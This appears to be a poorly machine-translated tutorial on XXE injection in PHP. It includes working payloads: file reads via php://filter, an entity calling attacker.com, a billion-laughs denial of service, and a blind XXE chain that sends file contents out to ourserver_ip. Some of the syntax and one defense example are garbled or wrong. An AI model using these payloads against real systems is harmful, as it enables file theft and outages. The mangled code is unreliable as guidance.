XXe Vulnerability Profile

XXe The reason why the vulnerability cannot be reproduced

The main problem is simplexml_load_file this function, in the old version is the default parsing entity, but in the new version, no longer the default parsing entity, you need to specify in the Simplexml_load_file function The third parameter is libxml_noent, Otherwise, the entity will not be parsed.

XXe Entity injection detailed

0x00 background

XXE injection is the XML External entity injection, which is the XML external entities injection attack. The vulnerability is a security issue that is raised when processing non-secure external Entity data. In the XML1.0 standard, the XML document structure defines the entity ( entity). Entities acting like "macros" in Word can also be understood as templates in DW, you can pre-define an entity, then call it multiple times in a document, or call the same entity in multiple documents ( XML defines two types of entity. One is the ordinary entity we are talking about here, used in an XML document, and the other is the parameter entity, which is used in the DTD file.)

The definition syntax for entity is

<! DOCTYPE filename
[<! ENTITY entity-name "Entity-content"
]>

The reference syntax for a defined entity in a document is:

&entity-name;

Entity can invoke external resources using the System keyword, which is supported by a number of protocols, such as: Http;file, for example:

File:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php

0x01 principle

If in the product function design, the parsing XML is externally controllable, that will possibly form, for example: file reads, DOS,CSRF and so on vulnerability. Each language has components and functions that support XML. The functions that are handled by default in PHP are: Xml_parse and simplexml_load. The Xml_parse is implemented as a expat library, which does not resolve external entities by default, and simplexml_load resolves external entities by default, creating a security threat. Write a script to test yourself:

<?php header ("content-type:text/html; Charset=utf-8 ");
echo "
 
Assuming that the variable $xml is externally controllable (such as Form post data), then we write a malicious external entity, as shown above, defining a xee entity that reads/TEC/PASSWD text and then passes the entity to the variable $xml, Finally, the XML parsing function simplexml_load_string () to PHP is parsed, resulting in a XXe vulnerability.



In addition to reading text payload above, there are several common payload

Read site content

 
<?xml version= "1.0" encoding= "Utf-8"?> <! 
DOCTYPE xdsec [
<! ELEMENT methodname any > 
<! ENTITY XXe SYSTEM "Http://attacker.com/text.txt" >]>
<methodcall> 
<methodname>&xxe; </methodname>
</methodcall>
 
If the include file fails, it is possible that the file itself contains the < characters when reading files such as PHP. You can use BASE64 encoding bypass, such as:

 
<?xml version= "1.0" encoding= "Utf-8"?> <! 
DOCTYPE xdsec [ 
<! ELEMENT methodname any >
<! ENTITY XXe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]> 
<methodcall>
<methodname>&xxe;</methodname> 
</methodcall>
 
Denial of service attack script

 
<?xml Version = "1.0"?> <! DOCTYPE Lolz [<! ENTITY lol "LOL" > <! ELEMENT lolz (#PCDATA) > <! ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;" > <! ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1 ;" > <! ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2 ;" > <! ENTITY Lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3 ;" > <! ENTITY Lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4 ;" > <! ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5 ;" > <! ENTITY Lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6 ;" > <! ENTITY Lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7; " > <! ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8 ;" >]> <lolz>&lol9;</lolz>
 


0X02 Defense

1. Check the underlying XML parsing library used, which disables parsing of external entities by default

2. Use third-party app code to upgrade patches in a timely manner

3. Increase monitoring of the system at the same time to prevent the problem being exploited by others

For PHP, because the XML parsing problem of the simplexml_load_string function is on the Libxml library, you can call such a function before loading the entity

 
<?
PHP Libxml_disable_entity_loader (true);
? >
 
For protection, for XmlReader and Dom mode resolution, you can refer to the following code:

 
<?php 
//With the XMLReader functionality: 
$doc = Xmlreader::xml ($badXml, ' UTF-8 ', libxml_nonet); 
With the DOM functionality: 
$dom = new DOMDocument (); 
$dom->loadxml ($badXml, libxml_dtdload| LIBXML_DTDATTR); 
? >
 
A loophole in the dark clouds

http://www.wooyun.org/bugs/wooyun-2010-09351

http://www.wooyun.org/bugs/wooyun-2010-059911

http://www.wooyun.org/bugs/wooyun-2010-058381

http://www.wooyun.org/bugs/wooyun-2010-058381


 blind XXe injection

When the page is unable to return information, try XXe blind

The core of pure blind XXe is the parametric entity, which has several characteristics:

A% reference can only be used within a DTD to immediately reference entity nesting
We use a client to receive service-side code, the code inserted into the vulnerable page is as follows

 
<?xml version= "1.0" encoding= "UTF-8"?> <!
DOCTYPE Root [
<! ENTITY% remote SYSTEM "Http://ourserver_ip/evil.xml" >
%remote;
%param1;
] >
<root>&external;</root>
 
Client Evil.xml Code

 
<! ENTITY% Payload SYSTEM "php://filter/read=convert.base64-encode/resource=bb.php" >
<! ENTITY% param1 "<! ENTITY external SYSTEM ' http://ourserver_ip/log.php?msg=%payload; ' > ">